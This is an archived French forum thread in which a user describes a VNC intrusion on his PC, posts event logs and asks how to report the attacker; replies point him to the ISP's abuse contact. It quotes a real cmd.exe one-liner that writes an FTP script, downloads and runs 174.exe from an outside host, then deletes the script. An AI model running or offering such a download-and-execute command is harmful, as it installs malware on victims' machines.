Aller au contenu

Interception intrusion


Messages recommandés

Bonjour,

je vous expose mon problème. Je regardai bien tranquillement un film sur mon ordinateur lorsque tout à coup ça s'agite sévèrement.

Mon film se coupe, une invite de commande se lance avec une commande trés douteuse mais cela est clair c'est une attaque (sur le port 5900(VNC default) après lecture des logs).

Reflex je debranche mon adaptateur wifi illico.

Pas de dommage

Immédiatement je consulte les logs et récupère l'ip du gus qui il y a de grandes chance pour qu'il ne soit techniquement pas être trés compétent. Il a du récupérer un petit logiciel qui va bien pour ensuite supprimer en masse le contenu de ma bécane.

D'autant plus qu'il a forcément effectué un scan de mes port ce qui je sais est interdit par la loi. Il faut obligatoirement une dérogation signée par le possesseur du réseau scanné.

Ma question est que puis-je / dois-je faire. Car ça m'étonnerai vu son peu de discretion que ce "H4ch3r" est fait une attaque par rebond.

Faut-il en réferer à mon provider, qui contacter ?

Merci de vos réponses.

Voici les traces que j'ai récupérées:

Type de l'événement : Informations

Source de l'événement : WinVNC4

Catégorie de l'événement : Aucun

ID de l'événement : 1

Date : 21/04/2007

Heure : 14:56:43

Utilisateur : N/A

Ordinateur : PC-BENJAMIN

Description :

Connections: closed: 83.72.63.54::3356 (read: Connection reset by peer (10054))

Type de l'événement : Informations

Source de l'événement : WinVNC4

Catégorie de l'événement : Aucun

ID de l'événement : 1

Date : 21/04/2007

Heure : 14:56:22

Utilisateur : N/A

Ordinateur : PC-BENJAMIN

Description :

Connections: accepted: 83.72.63.54::3356

Type de l'événement : Informations

Source de l'événement : WinVNC4

Catégorie de l'événement : Aucun

ID de l'événement : 1

Date : 21/04/2007

Heure : 14:56:22

Utilisateur : N/A

Ordinateur : PC-BENJAMIN

Description :

Connections: closed: 83.72.63.54::3354 (Clean disconnection)

Type de l'événement : Erreur

Source de l'événement : WinVNC4

Catégorie de l'événement : Aucun

ID de l'événement : 1

Date : 21/04/2007

Heure : 14:56:22

Utilisateur : N/A

Ordinateur : PC-BENJAMIN

Description :

SocketManager: unknown listener event: 0

Type de l'événement : Informations

Source de l'événement : WinVNC4

Catégorie de l'événement : Aucun

ID de l'événement : 1

Date : 21/04/2007

Heure : 14:56:22

Utilisateur : N/A

Ordinateur : PC-BENJAMIN

Description :

Connections: accepted: 83.72.63.54::3354

Voici la commande récupérée

cmd.exe /c del i&echo open 88.160.48.7 13867 > i&echo user 1 1 >> i &echo get 174.exe >> i &echo quit >> i &ftp -n -s:i &174.exe&del i&exit

Lien vers le commentaire
Partager sur d’autres sites

Oui mais je suis en IP fixe, de plus la commande qu'il a saisie semble avoir téléchargée un programme sur un ftp puis j'imagine qu'il l'a executer se programme et enfin à éffacé le binaire (ça ressemble à un botnet non?).

De toute façon le question est plus que puis-je faire légalement et à qui m'adresser pour dénoncer ceci et surtout fournir les emprunte que j'ai récupérées.

Lien vers le commentaire
Partager sur d’autres sites

Tu peux envoyer les traces à son FAI.

Après recherche de l'IP, son FAI est Tele2 Danemark et comme indiqué sur le whois tu peux envoyer un mail à abuse-dk@tele2.com (in english of course). Je sais pas si ils font quelque chose ou s'ils s'en foutent après :transpi:

Apparemment, le FTP sur lequel il télécharge le fichier .exe est une freebox donc la source est a priori déjà un bot :/

Par contre, ce qui est inquietant, c'est qu'il ait réussi à se connecter à ton PC!! Ca veut dire qu'il y a une "faille" quelque part!! Il y a bien un mdp de connexion sur ton VNC? C'est bien la dernière version? (pour éviter toute faille exploitée...)

Lien vers le commentaire
Partager sur d’autres sites

VNC etait bien protéger par un mot de passe, enfin bon j'ai fermé la porte bien entendu. Et je pense bien qu'il y est de grandes chances pour qu'il ne revienne pas mais c'est surtout qu'à mon avis c'est un script kiddies qui à récupérer un ptit soft qui va bien et ce genre de personne m'exaspère au plus au point alors je voulais tenter de faire quelque chose.

Lien vers le commentaire
Partager sur d’autres sites

Archivé

Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.

×
×
  • Créer...